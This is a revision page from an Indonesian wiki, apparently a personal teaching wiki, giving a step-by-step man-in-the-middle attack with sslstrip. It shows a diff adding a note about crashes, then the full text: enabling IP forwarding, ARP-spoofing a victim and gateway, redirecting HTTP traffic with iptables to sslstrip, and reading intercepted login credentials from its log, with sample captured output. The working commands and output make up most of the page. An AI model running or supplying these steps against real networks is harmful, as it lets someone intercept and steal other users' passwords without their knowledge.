Difference between revisions of "MITM: sslstrip"

From OnnoWiki
Jump to navigation Jump to search
Line 61: Line 61:
 
  2017-04-04 17:07:16,065 POST Data (192.168.0.100):
 
  2017-04-04 17:07:16,065 POST Data (192.168.0.100):
 
  login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1
 
  login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1
 +
 +
 +
==Crashing==
  
 
Entah kenapa sslstrip ini suka crash :( ...
 
Entah kenapa sslstrip ini suka crash :( ...
  
 +
Solusinya, coba tambahkan > /dev/null
 +
 +
sslstrip -k -f -l 10000 2> /dev/null
  
  

Revision as of 03:55, 5 April 2017

Sumber: https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/


Langkah untuk melakukan serangan menggunakan ssltrip adalah sebagai berikut.

Cek routing, 

route -n
netstat -nr

enable forward paket, 

echo “1” > /proc/sys/net/ipv4/ip_forward

lakukan arpspoof, 

arpspoof -i eth0 -t victimip routerip

arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

Cek apakah berhasil, arp -n di 192.168.0.106 

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   66:31:65:39:62:38   C                     enp3s0

Setelah arpspoof di jalankan, lakukan arp -n 

arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.13             ether   ec:a8:6b:f8:2e:fc   C                     enp3s0
192.168.0.146            ether   08:00:27:45:7a:dc   C                     enp3s0
192.168.0.223            ether   d0:04:92:19:cc:38   C                     enp3s0
192.168.0.7              ether   4c:e6:76:1f:15:4c   C                     enp3s0
192.168.0.100            ether   08:00:27:45:7a:dc   C                     enp3s0

Perhatikan MAC address 192.168.0.100 berubah :) ..


redirect inbound traffic ke port 80 (http), menuju port 1000 (sslstrip). 

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

Jalankan sslstrip agar listen pada port 10000 (default sslstrip) 

cd ~
sslstrip -l 10000 (untuk kali linux)
python sslstrip.pl –l 10000 (untuk backtrack)

hasil penyadapan bisa dilihat di sslstrip.log, misalnya, 

cd ~
tail sslstrip.log
more sslstrip.log 

2017-04-04 17:07:16,065 POST Data (192.168.0.100):
login_username=onno&secretkey=123456&js_autodetect_results=1&just_logged_in=1


Crashing

Entah kenapa sslstrip ini suka crash :( ...

Solusinya, coba tambahkan > /dev/null 

sslstrip -k -f -l 10000 2> /dev/null


Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=MITM:_sslstrip&oldid=47520"